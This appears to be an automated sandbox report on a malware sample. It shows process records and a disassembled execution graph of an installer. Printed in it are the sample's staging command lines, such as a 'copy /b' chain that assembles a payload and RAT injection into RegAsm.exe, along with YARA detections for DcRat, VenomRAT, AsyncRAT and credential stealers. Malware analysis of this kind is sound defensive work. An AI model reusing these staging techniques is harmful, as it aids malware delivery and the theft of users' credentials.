                                                                                              Commandline:cmd /c copy /b ..\Solaris + ..\Harassment + ..\Proudly + ..\Turned + ..\Viruses + ..\Wallpapers + ..\Usc + ..\Crm + ..\Ribbon + ..\Confident + ..\Angle + ..\Alumni + ..\Fees + ..\Reserve + ..\Reflected + ..\Include + ..\Specialist + ..\Respondent + ..\False + ..\Assume + ..\Regardless + ..\Mary + ..\Consecutive + ..\Movers + ..\Scottish + ..\Holocaust + ..\Experience + ..\Phrase + ..\Started + ..\Disturbed + ..\Needle + ..\Pipes + ..\Hollow + ..\Spelling + ..\Reed + ..\Tft + ..\Specialties Y
                                                                                              Imagebase:0x410000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:11
                                                                                              Start time:06:38:17
                                                                                              Start date:12/12/2024
                                                                                              Path:C:\Users\user\AppData\Local\Temp\585711\Depression.com
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:Depression.com Y
                                                                                              Imagebase:0x1000000
                                                                                              File size:947'288 bytes
                                                                                              MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Antivirus matches:
                                                                                              • Detection: 0%, ReversingLabs
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:12
                                                                                              Start time:06:38:17
                                                                                              Start date:12/12/2024
                                                                                              Path:C:\Windows\SysWOW64\choice.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:choice /d y /t 5
                                                                                              Imagebase:0xa10000
                                                                                              File size:28'160 bytes
                                                                                              MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:14
                                                                                              Start time:06:39:06
                                                                                              Start date:12/12/2024
                                                                                              Path:C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe
                                                                                              Imagebase:0xd90000
                                                                                              File size:65'440 bytes
                                                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 0000000E.00000002.2630405640.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              Antivirus matches:
                                                                                              • Detection: 0%, ReversingLabs
                                                                                              Has exited:false

                                                                                              Disassembly

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:17.7%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:21%
                                                                                                Total number of Nodes:1482
                                                                                                Total number of Limit Nodes:28
                                                                                                execution_graph 4201 402fc0 4202 401446 18 API calls 4201->4202 4203 402fc7 4202->4203 4204 401a13 4203->4204 4205 403017 4203->4205 4206 40300a 4203->4206 4208 406831 18 API calls 4205->4208 4207 401446 18 API calls 4206->4207 4207->4204 4208->4204 4209 4023c1 4210 40145c 18 API calls 4209->4210 4211 4023c8 4210->4211 4214 407296 4211->4214 4217 406efe CreateFileW 4214->4217 4218 406f30 4217->4218 4219 406f4a ReadFile 4217->4219 4220 4062cf 11 API calls 4218->4220 4221 4023d6 4219->4221 4224 406fb0 4219->4224 4220->4221 4222 406fc7 ReadFile lstrcpynA lstrcmpA 4222->4224 4225 40700e SetFilePointer ReadFile 4222->4225 4223 40720f CloseHandle 4223->4221 4224->4221 4224->4222 4224->4223 4226 407009 4224->4226 4225->4223 4227 4070d4 ReadFile 4225->4227 4226->4223 4228 407164 4227->4228 4228->4226 4228->4227 4229 40718b SetFilePointer GlobalAlloc ReadFile 4228->4229 4230 4071eb lstrcpynW GlobalFree 4229->4230 4231 4071cf 4229->4231 4230->4223 4231->4230 4231->4231 4232 401cc3 4233 40145c 18 API calls 4232->4233 4234 401cca lstrlenW 4233->4234 4235 4030dc 4234->4235 4236 4030e3 4235->4236 4238 405f7d wsprintfW 4235->4238 4238->4236 4239 401c46 4240 40145c 18 API calls 4239->4240 4241 401c4c 4240->4241 4242 4062cf 11 API calls 4241->4242 4243 401c59 4242->4243 4244 406cc7 81 API calls 4243->4244 4245 401c64 4244->4245 4246 403049 4247 401446 18 API calls 4246->4247 4248 403050 4247->4248 4249 406831 18 API calls 4248->4249 4250 401a13 4248->4250 4249->4250 4251 40204a 4252 401446 18 API calls 4251->4252 4253 402051 IsWindow 4252->4253 4254 4018d3 4253->4254 4255 40324c 4256 403277 4255->4256 4257 40325e SetTimer 4255->4257 4258 4032cc 4256->4258 4259 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4256->4259 4257->4256 4259->4258 4260 4022cc 4261 40145c 18 API calls 4260->4261 4262 4022d3 4261->4262 4263 406301 2 API calls 4262->4263 4264 4022d9 4263->4264 4266 4022e8 4264->4266 4269 405f7d wsprintfW 4264->4269 4267 4030e3 4266->4267 4270 405f7d wsprintfW 4266->4270 4269->4266 4270->4267 4271 4030cf 4272 40145c 18 API calls 4271->4272 4273 4030d6 4272->4273 4275 4030dc 4273->4275 4278 4063d8 GlobalAlloc lstrlenW 4273->4278 4276 4030e3 4275->4276 4305 405f7d wsprintfW 4275->4305 4279 406460 4278->4279 4280 40640e 4278->4280 4279->4275 4281 40643b GetVersionExW 4280->4281 4306 406057 CharUpperW 4280->4306 4281->4279 4282 40646a 4281->4282 4283 406490 LoadLibraryA 4282->4283 4284 406479 4282->4284 4283->4279 4287 4064ae GetProcAddress GetProcAddress GetProcAddress 4283->4287 4284->4279 4286 4065b1 GlobalFree 4284->4286 4288 4065c7 LoadLibraryA 4286->4288 4289 406709 FreeLibrary 4286->4289 4290 406621 4287->4290 4294 4064d6 4287->4294 4288->4279 4292 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4288->4292 4289->4279 4291 40667d FreeLibrary 4290->4291 4293 406656 4290->4293 4291->4293 4292->4290 4297 406716 4293->4297 4302 4066b1 lstrcmpW 4293->4302 4303 4066e2 CloseHandle 4293->4303 4304 406700 CloseHandle 4293->4304 4294->4290 4295 406516 4294->4295 4296 4064fa FreeLibrary GlobalFree 4294->4296 4295->4286 4298 406528 lstrcpyW OpenProcess 4295->4298 4300 40657b CloseHandle CharUpperW lstrcmpW 4295->4300 4296->4279 4299 40671b CloseHandle FreeLibrary 4297->4299 4298->4295 4298->4300 4301 406730 CloseHandle 4299->4301 4300->4290 4300->4295 4301->4299 4302->4293 4302->4301 4303->4293 4304->4289 4305->4276 4306->4280 4307 4044d1 4308 40450b 4307->4308 4309 40453e 4307->4309 4375 405cb0 GetDlgItemTextW 4308->4375 4310 40454b GetDlgItem GetAsyncKeyState 4309->4310 4314 4045dd 4309->4314 4312 40456a GetDlgItem 4310->4312 4325 404588 4310->4325 4317 403d6b 19 API calls 4312->4317 4313 4046c9 4373 40485f 4313->4373 4377 405cb0 GetDlgItemTextW 4313->4377 4314->4313 4322 406831 18 API calls 4314->4322 4314->4373 4315 404516 4316 406064 5 API calls 4315->4316 4318 40451c 4316->4318 4320 40457d ShowWindow 4317->4320 4321 403ea0 5 API calls 4318->4321 4320->4325 4326 404521 GetDlgItem 4321->4326 4327 40465b SHBrowseForFolderW 4322->4327 4323 4046f5 4328 4067aa 18 API calls 4323->4328 4324 403df6 8 API calls 4329 404873 4324->4329 4330 4045a5 SetWindowTextW 4325->4330 4334 405d85 4 API calls 4325->4334 4331 40452f IsDlgButtonChecked 4326->4331 4326->4373 4327->4313 4333 404673 CoTaskMemFree 4327->4333 4338 4046fb 4328->4338 4332 403d6b 19 API calls 4330->4332 4331->4309 4336 4045c3 4332->4336 4337 40674e 3 API calls 4333->4337 4335 40459b 4334->4335 4335->4330 4342 40674e 3 API calls 4335->4342 4339 403d6b 19 API calls 4336->4339 4340 404680 4337->4340 4378 406035 lstrcpynW 4338->4378 4343 4045ce 4339->4343 4344 4046b7 SetDlgItemTextW 4340->4344 4349 406831 18 API calls 4340->4349 4342->4330 4376 403dc4 SendMessageW 4343->4376 4344->4313 4345 404712 4347 406328 3 API calls 4345->4347 4356 40471a 4347->4356 4348 4045d6 4350 406328 3 API calls 4348->4350 4351 40469f lstrcmpiW 4349->4351 4350->4314 4351->4344 4354 4046b0 lstrcatW 4351->4354 4352 40475c 4379 406035 lstrcpynW 4352->4379 4354->4344 4355 404765 4357 405d85 4 API calls 4355->4357 4356->4352 4360 40677d 2 API calls 4356->4360 4362 4047b1 4356->4362 4358 40476b GetDiskFreeSpaceW 4357->4358 4361 40478f MulDiv 4358->4361 4358->4362 4360->4356 4361->4362 4363 40480e 4362->4363 4380 4043d9 4362->4380 4364 404831 4363->4364 4366 40141d 80 API calls 4363->4366 4388 403db1 KiUserCallbackDispatcher 4364->4388 4366->4364 4367 4047ff 4369 404810 SetDlgItemTextW 4367->4369 4370 404804 4367->4370 4369->4363 4372 4043d9 21 API calls 4370->4372 4371 40484d 4371->4373 4389 403d8d 4371->4389 4372->4363 4373->4324 4375->4315 4376->4348 4377->4323 4378->4345 4379->4355 4381 4043f9 4380->4381 4382 406831 18 API calls 4381->4382 4383 404439 4382->4383 4384 406831 18 API calls 4383->4384 4385 404444 4384->4385 4386 406831 18 API calls 4385->4386 4387 404454 lstrlenW wsprintfW SetDlgItemTextW 4386->4387 4387->4367 4388->4371 4390 403da0 SendMessageW 4389->4390 4391 403d9b 4389->4391 4390->4373 4391->4390 4392 401dd3 4393 401446 18 API calls 4392->4393 4394 401dda 4393->4394 4395 401446 18 API calls 4394->4395 4396 4018d3 4395->4396 4397 402e55 4398 40145c 18 API calls 4397->4398 4399 402e63 4398->4399 4400 402e79 4399->4400 4401 40145c 18 API calls 4399->4401 4402 405e5c 2 API calls 4400->4402 4401->4400 4403 402e7f 4402->4403 4427 405e7c GetFileAttributesW CreateFileW 4403->4427 4405 402e8c 4406 402f35 4405->4406 4407 402e98 GlobalAlloc 4405->4407 4410 4062cf 11 API calls 4406->4410 4408 402eb1 4407->4408 4409 402f2c CloseHandle 4407->4409 4428 403368 SetFilePointer 4408->4428 4409->4406 4412 402f45 4410->4412 4414 402f50 DeleteFileW 4412->4414 4415 402f63 4412->4415 4413 402eb7 4416 403336 ReadFile 4413->4416 4414->4415 4429 401435 4415->4429 4418 402ec0 GlobalAlloc 4416->4418 4419 402ed0 4418->4419 4420 402f04 WriteFile GlobalFree 4418->4420 4422 40337f 33 API calls 4419->4422 4421 40337f 33 API calls 4420->4421 4423 402f29 4421->4423 4426 402edd 4422->4426 4423->4409 4425 402efb GlobalFree 4425->4420 4426->4425 4427->4405 4428->4413 4430 404f9e 25 API calls 4429->4430 4431 401443 4430->4431 4432 401cd5 4433 401446 18 API calls 4432->4433 4434 401cdd 4433->4434 4435 401446 18 API calls 4434->4435 4436 401ce8 4435->4436 4437 40145c 18 API calls 4436->4437 4438 401cf1 4437->4438 4439 401d07 lstrlenW 4438->4439 4440 401d43 4438->4440 4441 401d11 4439->4441 4441->4440 4445 406035 lstrcpynW 4441->4445 4443 401d2c 4443->4440 4444 401d39 lstrlenW 4443->4444 4444->4440 4445->4443 4446 402cd7 4447 401446 18 API calls 4446->4447 4449 402c64 4447->4449 4448 402d17 ReadFile 4448->4449 4449->4446 4449->4448 4450 402d99 4449->4450 4451 402dd8 4452 4030e3 4451->4452 4453 402ddf 4451->4453 4454 402de5 FindClose 4453->4454 4454->4452 4455 401d5c 4456 40145c 18 API calls 4455->4456 4457 401d63 4456->4457 4458 40145c 18 API calls 4457->4458 4459 401d6c 4458->4459 4460 401d73 lstrcmpiW 4459->4460 4461 401d86 lstrcmpW 4459->4461 4462 401d79 4460->4462 4461->4462 4463 401c99 4461->4463 4462->4461 4462->4463 4464 4027e3 4465 4027e9 4464->4465 4466 4027f2 4465->4466 4467 402836 4465->4467 4480 401553 4466->4480 4468 40145c 18 API calls 4467->4468 4470 40283d 4468->4470 4472 4062cf 11 API calls 4470->4472 4471 4027f9 4473 40145c 18 API calls 4471->4473 4477 401a13 4471->4477 4474 40284d 4472->4474 4475 40280a RegDeleteValueW 4473->4475 4484 40149d RegOpenKeyExW 4474->4484 4476 4062cf 11 API calls 4475->4476 4479 40282a RegCloseKey 4476->4479 4479->4477 4481 401563 4480->4481 4482 40145c 18 API calls 4481->4482 4483 401589 RegOpenKeyExW 4482->4483 4483->4471 4487 4014c9 4484->4487 4492 401515 4484->4492 4485 4014ef RegEnumKeyW 4486 401501 RegCloseKey 4485->4486 4485->4487 4489 406328 3 API calls 4486->4489 4487->4485 4487->4486 4488 401526 RegCloseKey 4487->4488 4490 40149d 3 API calls 4487->4490 4488->4492 4491 401511 4489->4491 4490->4487 4491->4492 4493 401541 RegDeleteKeyW 4491->4493 4492->4477 4493->4492 4494 4040e4 4495 4040ff 4494->4495 4501 40422d 4494->4501 4497 40413a 4495->4497 4525 403ff6 WideCharToMultiByte 4495->4525 4496 404298 4498 40436a 4496->4498 4499 4042a2 GetDlgItem 4496->4499 4505 403d6b 19 API calls 4497->4505 4506 403df6 8 API calls 4498->4506 4502 40432b 4499->4502 4503 4042bc 4499->4503 4501->4496 4501->4498 4504 404267 GetDlgItem SendMessageW 4501->4504 4502->4498 4507 40433d 4502->4507 4503->4502 4511 4042e2 6 API calls 4503->4511 4530 403db1 KiUserCallbackDispatcher 4504->4530 4509 40417a 4505->4509 4510 404365 4506->4510 4512 404353 4507->4512 4513 404343 SendMessageW 4507->4513 4515 403d6b 19 API calls 4509->4515 4511->4502 4512->4510 4516 404359 SendMessageW 4512->4516 4513->4512 4514 404293 4517 403d8d SendMessageW 4514->4517 4518 404187 CheckDlgButton 4515->4518 4516->4510 4517->4496 4528 403db1 KiUserCallbackDispatcher 4518->4528 4520 4041a5 GetDlgItem 4529 403dc4 SendMessageW 4520->4529 4522 4041bb SendMessageW 4523 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4522->4523 4524 4041d8 GetSysColor 4522->4524 4523->4510 4524->4523 4526 404033 4525->4526 4527 404015 GlobalAlloc WideCharToMultiByte 4525->4527 4526->4497 4527->4526 4528->4520 4529->4522 4530->4514 4531 402ae4 4532 402aeb 4531->4532 4533 4030e3 4531->4533 4534 402af2 CloseHandle 4532->4534 4534->4533 4535 402065 4536 401446 18 API calls 4535->4536 4537 40206d 4536->4537 4538 401446 18 API calls 4537->4538 4539 402076 GetDlgItem 4538->4539 4540 4030dc 4539->4540 4541 4030e3 4540->4541 4543 405f7d wsprintfW 4540->4543 4543->4541 4544 402665 4545 40145c 18 API calls 4544->4545 4546 40266b 4545->4546 4547 40145c 18 API calls 4546->4547 4548 402674 4547->4548 4549 40145c 18 API calls 4548->4549 4550 40267d 4549->4550 4551 4062cf 11 API calls 4550->4551 4552 40268c 4551->4552 4553 406301 2 API calls 4552->4553 4554 402695 4553->4554 4555 4026a6 lstrlenW lstrlenW 4554->4555 4557 404f9e 25 API calls 4554->4557 4559 4030e3 4554->4559 4556 404f9e 25 API calls 4555->4556 4558 4026e8 SHFileOperationW 4556->4558 4557->4554 4558->4554 4558->4559 4560 401c69 4561 40145c 18 API calls 4560->4561 4562 401c70 4561->4562 4563 4062cf 11 API calls 4562->4563 4564 401c80 4563->4564 4565 405ccc MessageBoxIndirectW 4564->4565 4566 401a13 4565->4566 4567 402f6e 4568 402f72 4567->4568 4569 402fae 4567->4569 4571 4062cf 11 API calls 4568->4571 4570 40145c 18 API calls 4569->4570 4577 402f9d 4570->4577 4572 402f7d 4571->4572 4573 4062cf 11 API calls 4572->4573 4574 402f90 4573->4574 4575 402fa2 4574->4575 4576 402f98 4574->4576 4579 406113 9 API calls 4575->4579 4578 403ea0 5 API calls 4576->4578 4578->4577 4579->4577 4580 4023f0 4581 402403 4580->4581 4582 4024da 4580->4582 4583 40145c 18 API calls 4581->4583 4584 404f9e 25 API calls 4582->4584 4585 40240a 4583->4585 4588 4024f1 4584->4588 4586 40145c 18 API calls 4585->4586 4587 402413 4586->4587 4589 402429 LoadLibraryExW 4587->4589 4590 40241b GetModuleHandleW 4587->4590 4591 4024ce 4589->4591 4592 40243e 4589->4592 4590->4589 4590->4592 4594 404f9e 25 API calls 4591->4594 4604 406391 GlobalAlloc WideCharToMultiByte 4592->4604 4594->4582 4595 402449 4596 40248c 4595->4596 4597 40244f 4595->4597 4598 404f9e 25 API calls 4596->4598 4599 401435 25 API calls 4597->4599 4602 40245f 4597->4602 4600 402496 4598->4600 4599->4602 4601 4062cf 11 API calls 4600->4601 4601->4602 4602->4588 4603 4024c0 FreeLibrary 4602->4603 4603->4588 4605 4063c9 GlobalFree 4604->4605 4606 4063bc GetProcAddress 4604->4606 4605->4595 4606->4605 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4607 4048f8 4608 404906 4607->4608 4609 40491d 4607->4609 4610 40490c 4608->4610 4625 404986 4608->4625 4611 40492b IsWindowVisible 4609->4611 4617 404942 4609->4617 4612 403ddb SendMessageW 4610->4612 4614 404938 4611->4614 4611->4625 4615 404916 4612->4615 4613 40498c CallWindowProcW 4613->4615 4626 40487a SendMessageW 4614->4626 4617->4613 4631 406035 lstrcpynW 4617->4631 4619 404971 4632 405f7d wsprintfW 4619->4632 4621 404978 4622 40141d 80 API calls 4621->4622 4623 40497f 4622->4623 4633 406035 lstrcpynW 4623->4633 4625->4613 4627 4048d7 SendMessageW 4626->4627 4628 40489d GetMessagePos ScreenToClient SendMessageW 4626->4628 4630 4048cf 4627->4630 4629 4048d4 4628->4629 4628->4630 4629->4627 4630->4617 4631->4619 4632->4621 4633->4625 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4634 4020f9 GetDC GetDeviceCaps 4635 401446 18 API calls 4634->4635 4636 402116 MulDiv 4635->4636 4637 401446 18 API calls 4636->4637 4638 40212c 4637->4638 4639 406831 18 API calls 4638->4639 4640 402165 CreateFontIndirectW 4639->4640 4641 4030dc 4640->4641 4642 4030e3 4641->4642 4644 405f7d wsprintfW 4641->4644 4644->4642 4645 4024fb 4646 40145c 18 API calls 4645->4646 4647 402502 4646->4647 4648 40145c 18 API calls 4647->4648 4649 40250c 4648->4649 4650 40145c 18 API calls 4649->4650 4651 402515 4650->4651 4652 40145c 18 API calls 4651->4652 4653 40251f 4652->4653 4654 40145c 18 API calls 4653->4654 4655 402529 4654->4655 4656 40253d 4655->4656 4657 40145c 18 API calls 4655->4657 4658 4062cf 11 API calls 4656->4658 4657->4656 4659 40256a CoCreateInstance 4658->4659 4660 40258c 4659->4660 4661 4026fc 4663 402708 4661->4663 4664 401ee4 4661->4664 4662 406831 18 API calls 4662->4664 4664->4661 4664->4662 3808 4019fd 3809 40145c 18 API calls 3808->3809 3810 401a04 3809->3810 3813 405eab 3810->3813 3814 405eb8 GetTickCount GetTempFileNameW 3813->3814 3815 401a0b 3814->3815 3816 405eee 3814->3816 3816->3814 3816->3815 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 